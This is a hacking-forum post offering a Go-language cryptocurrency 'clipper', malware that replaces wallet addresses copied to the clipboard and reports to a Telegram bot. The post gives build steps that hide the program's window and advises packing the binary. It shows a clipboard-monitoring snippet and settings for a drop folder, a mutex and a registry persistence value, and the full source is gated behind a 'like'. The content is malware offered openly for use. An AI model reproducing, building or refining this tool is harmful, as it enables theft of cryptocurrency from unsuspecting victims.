• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

C/C++ GO Clipper

Status
Not open for further replies.

itsMe

*KillmeMories*
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Jan 8, 2019
Messages
56,612
Solutions
2
Reputation
32
Reaction score
100,454
Points
2,313
Credits
32,640
‎6 Years of Service‎
 
76%
screenshot-11161.png


Go-lang clipper which reports to telegram bot make sure to pack the binary its large around 7,000kb.

Add your crypto addresses, API token and chatid to main.go (API token line 52 chatid line 57)

open command prompt and cd into go-clipper folder and run "go build -ldflags -H=windowsgui main.go"

To see this hidden content, you must like this content.
 
Updated

-Instead of a for loop he now uses a channel.

Code:
go func() {
        for {
            clipboardText, _ := clipboard.ReadAll()
            if clipboardText != lastClipboardText {
                clipboardChan <- clipboardText
                lastClipboardText = clipboardText
            }
            time.Sleep(time.Millisecond * 500)
        }
    }()
 - Now you can name Drop folder and Drop file.

Code:
   dirName  = "YourDir"
    fileName = "YourFile"
  mutexName    = "YourMutex"
    registryName = "YourRegistryValue"
To see this hidden content, you must like this content.
 
Status
Not open for further replies.
Back
Top